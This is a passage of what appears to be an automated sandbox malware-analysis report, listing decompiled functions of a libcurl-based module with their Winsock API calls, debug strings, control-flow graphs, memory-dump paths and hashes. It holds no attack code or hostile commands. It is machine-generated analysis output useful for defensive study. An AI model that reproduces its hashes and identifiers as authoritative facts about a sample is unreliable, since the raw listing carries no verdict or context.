                                                                                                                            • setsockopt.WS2_32(00000000,0000FFFF,00000008,00000000,00000004), ref: 6B6C43DE
                                                                                                                            • WSAIoctl.WS2_32(00000000,98000004,00000001,0000000C,00000000,00000000,00000004,00000000,00000000), ref: 6B6C4461
                                                                                                                            • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000007), ref: 6B6C446B
                                                                                                                              • Part of subcall function 6B6EA660: ioctlsocket.WS2_32(00000000,8004667E,TElk), ref: 6B6EA67A
                                                                                                                              • Part of subcall function 6B6FE5D0: QueryPerformanceCounter.KERNEL32(6B6EF03B,?,6B6C669E,6B6EF03B,?,?,?,?), ref: 6B6FE5E5
                                                                                                                              • Part of subcall function 6B6FE5D0: __alldvrm.LIBCMT ref: 6B6FE5FE
                                                                                                                              • Part of subcall function 6B6FE5D0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B6FE627
                                                                                                                            • connect.WS2_32(00000000,?,?), ref: 6B6C45D2
                                                                                                                              • Part of subcall function 6B6E69D0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B6E6A0D
                                                                                                                            • WSAGetLastError.WS2_32 ref: 6B6C4604
                                                                                                                            Strings
                                                                                                                            • Trying %s:%ld..., xrefs: 6B6C4271
                                                                                                                            • Immediate connect fail for %s: %s, xrefs: 6B6C463A
                                                                                                                            • Failed to set SO_KEEPALIVE on fd %d, xrefs: 6B6C43E9
                                                                                                                            • Could not set TCP_NODELAY: %s, xrefs: 6B6C42EB
                                                                                                                            • @, xrefs: 6B6C430C
                                                                                                                            • sa_addr inet_ntop() failed with errno %d: %s, xrefs: 6B6C4235
                                                                                                                            • Failed to set SIO_KEEPALIVE_VALS on fd %d: %d, xrefs: 6B6C4473
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                            • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLastsetsockopt$Unothrow_t@std@@@__ehfuncinfo$??2@$CounterIoctlPerformanceQuery__alldvrmconnectcurl_msnprintfcurl_mvsnprintfgetsockoptioctlsocketsocket
                                                                                                                            • String ID: Trying %s:%ld...$ @$Could not set TCP_NODELAY: %s$Failed to set SIO_KEEPALIVE_VALS on fd %d: %d$Failed to set SO_KEEPALIVE on fd %d$Immediate connect fail for %s: %s$sa_addr inet_ntop() failed with errno %d: %s
                                                                                                                            • API String ID: 194311702-3868455274
                                                                                                                            • Opcode ID: ba3f447e3a5afb9c483e2d15c8e6d583adbf2df9715ced50144f6a203951d265
                                                                                                                            • Instruction ID: d97729a51b8a95d8d4beee8c286c698f53ad9e2caf9096ffc921c039a097a003
                                                                                                                            • Opcode Fuzzy Hash: ba3f447e3a5afb9c483e2d15c8e6d583adbf2df9715ced50144f6a203951d265
                                                                                                                            • Instruction Fuzzy Hash: 94F193B1D40219AFEB20DF74CC89BAEB7B8EF05304F1001E6E519E6290DB799E858F55
                                                                                                                            Function 6B6C36A0 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 211networkCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • getpeername.WS2_32(?,?,?), ref: 6B6C36FE
                                                                                                                            • WSAGetLastError.WS2_32 ref: 6B6C3708
                                                                                                                              • Part of subcall function 6B6FA0E0: GetLastError.KERNEL32(?,?,00000100), ref: 6B6FA0E7
                                                                                                                              • Part of subcall function 6B6F05D0: curl_mvsnprintf.LIBCURL(?,00000100,6B6EC830,?), ref: 6B6F0610
                                                                                                                            • getsockname.WS2_32(?,?,00000080), ref: 6B6C3772
                                                                                                                            • WSAGetLastError.WS2_32 ref: 6B6C377C
                                                                                                                            Strings
                                                                                                                            • getpeername() failed with errno %d: %s, xrefs: 6B6C3724
                                                                                                                            • ssrem inet_ntop() failed with errno %d: %s, xrefs: 6B6C3801
                                                                                                                            • getsockname() failed with errno %d: %s, xrefs: 6B6C3798
                                                                                                                            • ssloc inet_ntop() failed with errno %d: %s, xrefs: 6B6C38A0
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                            • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLast$curl_mvsnprintfgetpeernamegetsockname
                                                                                                                            • String ID: getpeername() failed with errno %d: %s$getsockname() failed with errno %d: %s$ssloc inet_ntop() failed with errno %d: %s$ssrem inet_ntop() failed with errno %d: %s
                                                                                                                            • API String ID: 673488319-670633250
                                                                                                                            • Opcode ID: f794888c9428704316612fe447c4d380d2cebe23082d3aea871a010df98db92f
                                                                                                                            • Instruction ID: ecf90f9bae24e301c42d52fef031eada92b570d952f6195d42ad8dcae2284dde
                                                                                                                            • Opcode Fuzzy Hash: f794888c9428704316612fe447c4d380d2cebe23082d3aea871a010df98db92f
                                                                                                                            • Instruction Fuzzy Hash: CF81B0B59007089BD721DF74C945BEAB3FCEF58308F1041AAE99D9B202EB357A85CB54
                                                                                                                            Function 6B6C16D0 Relevance: 12.1, APIs: 8, Instructions: 79networkCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • curl_msnprintf.LIBCURL(?,0000000C,6B72B330,?), ref: 6B6C16FA
                                                                                                                              • Part of subcall function 6B6C6E10: getaddrinfo.WS2_32(?,?,?,6B72B330), ref: 6B6C6E2E
                                                                                                                            • WSAGetLastError.WS2_32 ref: 6B6C1722
                                                                                                                            • WSAGetLastError.WS2_32 ref: 6B6C1728
                                                                                                                            • EnterCriticalSection.KERNEL32(?), ref: 6B6C173B
                                                                                                                            • LeaveCriticalSection.KERNEL32(?), ref: 6B6C1749
                                                                                                                            • send.WS2_32(?,?,00000001,00000000), ref: 6B6C1778
                                                                                                                            • WSAGetLastError.WS2_32 ref: 6B6C1782
                                                                                                                            • LeaveCriticalSection.KERNEL32(?), ref: 6B6C1790
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                            • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CriticalErrorLastSection$Leave$Entercurl_msnprintfgetaddrinfosend
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1592919352-0
                                                                                                                            • Opcode ID: 31f7f343508174b5c2a5f49438565bbb3e12dd81bffc949d545c7eac986e72aa
                                                                                                                            • Instruction ID: 431a854138dc254588308927b72f378d46f77fcf58eb6134e7449db850bcff70
                                                                                                                            • Opcode Fuzzy Hash: 31f7f343508174b5c2a5f49438565bbb3e12dd81bffc949d545c7eac986e72aa
                                                                                                                            • Instruction Fuzzy Hash: B0217F71500609DBDB219FB5CC85BABBBF8EF05300F10452AE666D3250EB35E915CBA5
                                                                                                                            Function 6B6D84A0 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 201COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 479 6b6d84a0-6b6d84e5 480 6b6d84f7-6b6d8507 call 6b6d8840 479->480 481 6b6d84e7-6b6d84f4 call 6b6f3fd0 479->481 486 6b6d8509-6b6d8522 call 6b6f06b0 480->486 487 6b6d8525-6b6d852c 480->487 481->480 486->487 489 6b6d852e-6b6d8536 call 6b6f4010 487->489 490 6b6d8539-6b6d853d 487->490 489->490 493 6b6d8661 490->493 494 6b6d8543-6b6d8551 490->494 495 6b6d8664-6b6d867c call 6b70db71 493->495 497 6b6d8589-6b6d8598 inet_pton 494->497 498 6b6d8553-6b6d8580 call 6b6e7550 * 2 494->498 500 6b6d85b9-6b6d85c8 inet_pton 497->500 501 6b6d859a-6b6d85b0 call 6b6c6fb0 497->501 517 6b6d86cf-6b6d86e2 call 6b70db71 498->517 528 6b6d8586 498->528 506 6b6d85e9-6b6d85f4 call 6b6d8a60 500->506 507 6b6d85ca-6b6d85e0 call 6b6c6fb0 500->507 513 6b6d867d-6b6d8684 501->513 514 6b6d85b6 501->514 506->517 518 6b6d85fa-6b6d85fe 506->518 507->513 521 6b6d85e6 507->521 519 6b6d8686-6b6d8690 call 6b6f3fd0 513->519 520 6b6d8693-6b6d86ad call 6b6d7ae0 513->520 514->500 523 6b6d8619-6b6d8622 call 6b6d78a0 518->523 524 6b6d8600-6b6d8607 518->524 519->520 536 6b6d86af-6b6d86b7 call 6b6f4010 520->536 537 6b6d86ba-6b6d86be 520->537 521->506 535 6b6d8627-6b6d862e 523->535 524->523 529 6b6d8609-6b6d8617 call 6b6edb40 524->529 528->497 529->535 535->513 542 6b6d8630-6b6d8633 535->542 536->537 539 6b6d86cb-6b6d86cd 537->539 540 6b6d86c0-6b6d86c9 call 6b6c6de0 537->540 539->495 540->493 542->493 545 6b6d8635-6b6d8641 542->545 547 6b6d864a call 6b6c1380 545->547 548 6b6d8643-6b6d8648 call 6b6edcd0 545->548 551 6b6d864f-6b6d8654 547->551 548->551 551->517 553 6b6d8656-6b6d865e 551->553 553->493
                                                                                                                            APIs
                                                                                                                            • inet_pton.WS2_32(00000002,00000000,?), ref: 6B6D8590
                                                                                                                            • inet_pton.WS2_32(00000017,00000000,?), ref: 6B6D85C0
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                            • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: inet_pton
                                                                                                                            • String ID: )<lk$)<lk$)<lk$Hostname %s was found in DNS cache
                                                                                                                            • API String ID: 1350483568-3671802404
                                                                                                                            • Opcode ID: 1c28eafcb50f3711334e6d1174d04fe58609dc9bf351ed409e48cacdd613dded
                                                                                                                            • Instruction ID: 356f66995a02274debb31f0126a8ce06fd1ff0848e54ff8c884d9b3d939e2fd2
                                                                                                                            • Opcode Fuzzy Hash: 1c28eafcb50f3711334e6d1174d04fe58609dc9bf351ed409e48cacdd613dded
                                                                                                                            • Instruction Fuzzy Hash: 5961E5B1D00209ABDB118BB4DC46BFFBBB8EF05328F0011A5E914B6291E7785A15CBE5
                                                                                                                            Function 6B6D1650 Relevance: 6.2, APIs: 4, Instructions: 151COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • curl_multi_remove_handle.LIBCURL(?), ref: 6B6D1681
                                                                                                                            • curl_multi_cleanup.LIBCURL(?), ref: 6B6D1691
                                                                                                                            • curl_slist_free_all.LIBCURL(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6B6D1904
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                            • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: curl_multi_cleanupcurl_multi_remove_handlecurl_slist_free_all
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3107128920-0
                                                                                                                            • Opcode ID: 7d09ce2e7191af035cb1e8f6d66df7902976baac0e5090d9848ab54a849070cc
                                                                                                                            • Instruction ID: 6ce3f8b9e2d62156689427ca7a2a7d36190fc0afffa378f0d2f767684dfe2421
                                                                                                                            • Opcode Fuzzy Hash: 7d09ce2e7191af035cb1e8f6d66df7902976baac0e5090d9848ab54a849070cc
                                                                                                                            • Instruction Fuzzy Hash: AB6152B8001B90DBDB216FB0DD0ABC67FE5BF0530AF00485AE5AE52654C7B9B054CF65
                                                                                                                            Function 6B6C9E30 Relevance: 6.1, APIs: 4, Instructions: 57COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                            • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 72a322f10b3873b807f612451f5fb050e4e8b84df307eaafe1eeccae1deeb89b
                                                                                                                            • Instruction ID: 15175e5a1453be4b8627e4ad3f3ce228d32a0340ccbcd95a4dcbd3ea0a822d5e
                                                                                                                            • Opcode Fuzzy Hash: 72a322f10b3873b807f612451f5fb050e4e8b84df307eaafe1eeccae1deeb89b
                                                                                                                            • Instruction Fuzzy Hash: 76014EB1E0121467DB2259759CC1BAB7B6CCF55A5CF0400A9EC0CA7283D7288C0183F2
                                                                                                                            Function 6B6C2A60 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 200COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 686 6b6c2a60-6b6c2a9b 687 6b6c2a9d 686->687 688 6b6c2aa0-6b6c2aa3 686->688 687->688 689 6b6c2ab8 688->689 690 6b6c2aa5-6b6c2aa8 688->690 693 6b6c2aba-6b6c2abd 689->693 691 6b6c2aae-6b6c2ab1 690->691 692 6b6c2b60-6b6c2b62 690->692 694 6b6c2abf-6b6c2afd call 6b6fe5d0 call 6b6fe680 691->694 695 6b6c2ab3-6b6c2ab5 691->695 692->693 693->694 700 6b6c2c83-6b6c2c9e call 6b6f05d0 694->700 701 6b6c2b03-6b6c2b05 694->701 695->689 701->700 702 6b6c2b0b 701->702 704 6b6c2b0d-6b6c2b0f 702->704 705 6b6c2b15-6b6c2b53 call 6b6d83d0 702->705 704->700 704->705 709 6b6c2b55-6b6c2b5e 705->709 710 6b6c2b67-6b6c2b7c call 6b70db90 705->710 711 6b6c2b7f-6b6c2b98 709->711 710->711 714 6b6c2ba8-6b6c2bb6 711->714 715 6b6c2b9a-6b6c2ba5 call 6b70db90 711->715 716 6b6c2bbd 714->716 717 6b6c2bb8-6b6c2bbb 714->717 715->714 719 6b6c2bbf-6b6c2be4 716->719 717->719 721 6b6c2be6-6b6c2be9 719->721 722 6b6c2bf2-6b6c2bfa 719->722 721->722 723 6b6c2beb-6b6c2bf0 721->723 724 6b6c2c00-6b6c2c02 722->724 723->721 723->722 725 6b6c2c04-6b6c2c08 724->725 726 6b6c2c62-6b6c2c82 call 6b6e69d0 724->726 728 6b6c2c4c-6b6c2c53 725->728 729 6b6c2c0a 725->729 728->724 730 6b6c2c55-6b6c2c57 728->730 732 6b6c2c10-6b6c2c13 call 6b6c40c0 729->732 730->726 733 6b6c2c59-6b6c2c61 730->733 735 6b6c2c18-6b6c2c1f 732->735 736 6b6c2c49 735->736 737 6b6c2c21-6b6c2c25 735->737 736->728 738 6b6c2c27-6b6c2c2c 737->738 739 6b6c2c40-6b6c2c47 737->739 738->739 740 6b6c2c2e-6b6c2c31 738->740 739->732 739->736 741 6b6c2c34-6b6c2c37 740->741 741->739 742 6b6c2c39-6b6c2c3e 741->742 742->739 742->741
                                                                                                                            APIs
                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B6C2B71
                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B6C2BA0
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                            • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                            • String ID: Connection time-out
                                                                                                                            • API String ID: 885266447-165637984
                                                                                                                            • Opcode ID: 5b287ab0d8453ec230e27cae544457afd2878332ac730b8cec12dff7ce44126f
                                                                                                                            • Instruction ID: e18efaf4b1d3f5ba7d7f9a25b5939464115666edf26541ca5fef084593084e37
                                                                                                                            • Opcode Fuzzy Hash: 5b287ab0d8453ec230e27cae544457afd2878332ac730b8cec12dff7ce44126f
                                                                                                                            • Instruction Fuzzy Hash: BF71AEB1E006058FDB14CF68C985BABB7B5FF84314F1491B9EC18AB351E7369942CB81
                                                                                                                            Function 6B6F07E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24networkCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 743 6b6f07e0-6b6f07f9 recv 744 6b6f081e-6b6f0826 743->744 745 6b6f07fb-6b6f081d WSAGetLastError 743->745
                                                                                                                            APIs
                                                                                                                            • recv.WS2_32(00000008,?,?,00000000), ref: 6B6F07EE
                                                                                                                            • WSAGetLastError.WS2_32(?,6B6F737C,?,?,00000008,?), ref: 6B6F07FB
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                            • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLastrecv
                                                                                                                            • String ID: |sok
                                                                                                                            • API String ID: 2514157807-1847581065
                                                                                                                            • Opcode ID: dc9ce6d7090bd6e90c7468e110a5b9ddd298d6537c754885b622d4eb5261dae7
                                                                                                                            • Instruction ID: 79449fb72f6e1e6c788e7dd7e6d48e92b1ac703c5c5d4f0ac18e72ecaac282de
                                                                                                                            • Opcode Fuzzy Hash: dc9ce6d7090bd6e90c7468e110a5b9ddd298d6537c754885b622d4eb5261dae7
                                                                                                                            • Instruction Fuzzy Hash: 97E09A3020820CAFDF058F70DC0475E3BA6EF45320F504568F9298A3D0C732E922AB50
                                                                                                                            Function 6B6C6E10 Relevance: 4.6, APIs: 3, Instructions: 146networkCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 746 6b6c6e10-6b6c6e39 getaddrinfo 747 6b6c6e3f-6b6c6e45 746->747 748 6b6c6fa7-6b6c6fab 746->748 749 6b6c6e4b-6b6c6e4c 747->749 750 6b6c6f93-6b6c6f99 WSASetLastError 747->750 751 6b6c6e50-6b6c6e55 749->751 752 6b6c6f9f-6b6c6fa6 750->752 753 6b6c6e6e 751->753 754 6b6c6e57-6b6c6e5a 751->754 752->748 756 6b6c6e70-6b6c6e79 753->756 755 6b6c6e60-6b6c6e65 754->755 755->755 757 6b6c6e67-6b6c6e6c 755->757 758 6b6c6e7b-6b6c6e80 756->758 759 6b6c6e82-6b6c6e85 756->759 757->756 760 6b6c6e90-6b6c6e97 758->760 761 6b6c6e8b 759->761 762 6b6c6f35-6b6c6f3a 759->762 760->762 764 6b6c6e9d-6b6c6ea2 760->764 761->760 762->751 763 6b6c6f40 762->763 765 6b6c6f43-6b6c6f49 763->765 764->762 766 6b6c6ea8-6b6c6eaa 764->766 767 6b6c6f4b-6b6c6f4c freeaddrinfo 765->767 768 6b6c6f52-6b6c6f54 765->768 766->762 769 6b6c6eb0-6b6c6ec3 766->769 767->768 770 6b6c6f8f-6b6c6f91 768->770 771 6b6c6f56-6b6c6f58 768->771 776 6b6c6ec9-6b6c6f0b call 6b70f070 769->776 777 6b6c6f85-6b6c6f8d 769->777 770->750 770->752 772 6b6c6f5a 771->772 773 6b6c6f76-6b6c6f84 771->773 775 6b6c6f60-6b6c6f71 772->775 781 6b6c6f73 775->781 782 6b6c6f0d-6b6c6f20 call 6b70f070 776->782 783 6b6c6f23-6b6c6f2d 776->783 777->765 781->773 782->783 785 6b6c6f2f 783->785 786 6b6c6f32 783->786 785->786 786->762
                                                                                                                            APIs
                                                                                                                            • getaddrinfo.WS2_32(?,?,?,6B72B330), ref: 6B6C6E2E
                                                                                                                            • freeaddrinfo.WS2_32(6B72B330,?,?,6B72B330,?), ref: 6B6C6F4C
                                                                                                                            • WSASetLastError.WS2_32(00002AF9,?,?,6B72B330,?), ref: 6B6C6F99
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                            • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLastfreeaddrinfogetaddrinfo
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1817844550-0
                                                                                                                            • Opcode ID: 8ce6bc7a58fa13c4e975ad497f221630ff0aaa238399f03e126b200a974cfad6
                                                                                                                            • Instruction ID: 8a556fb604b0ef39da94450002e8a6a60a58b41d8dc0d3a3614f34c7306c7daf
                                                                                                                            • Opcode Fuzzy Hash: 8ce6bc7a58fa13c4e975ad497f221630ff0aaa238399f03e126b200a974cfad6
                                                                                                                            • Instruction Fuzzy Hash: 1A51ACB1E047069FDB10CF99D580AABB7F6FF08700B0485AAE869D7310DB34E914CB96
                                                                                                                            Function 6B718360 Relevance: 4.6, APIs: 3, Instructions: 51threadCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • CreateThread.KERNEL32(6B6C16D0,6B6C1218,6B718204,00000000,00000000,6B6C16D0), ref: 6B7183A9
                                                                                                                            • GetLastError.KERNEL32(?,?,?,6B6C9136,00000000,00000000,6B6C16D0,6B6C1218,00000000,00000000), ref: 6B7183B5
                                                                                                                            • __dosmaperr.LIBCMT ref: 6B7183BC
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                            • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateErrorLastThread__dosmaperr
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2744730728-0
                                                                                                                            • Opcode ID: cb1c2a65bb690c2852bc6fcb33557736ebc7b5ee01a47790e36c1377a1c1566e
                                                                                                                            • Instruction ID: cd7e61a9c2ddc8395a91efc6d5fc96cf6c9aac73c00bc716d5f6bcb9b5e2405d
                                                                                                                            • Opcode Fuzzy Hash: cb1c2a65bb690c2852bc6fcb33557736ebc7b5ee01a47790e36c1377a1c1566e
                                                                                                                            • Instruction Fuzzy Hash: B0017172519219EFDF058FB1CE0AA9F7BA8EF05368F084169F81196150DB78DA10DBB0
                                                                                                                            Function 6B6C4740 Relevance: 4.5, APIs: 3, Instructions: 36networkCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • SleepEx.KERNEL32(00000000,00000000), ref: 6B6C4758
                                                                                                                            • getsockopt.WS2_32(00000004,0000FFFF,00001007,00000000,00000004), ref: 6B6C4773
                                                                                                                            • WSAGetLastError.WS2_32 ref: 6B6C477D
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                            • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
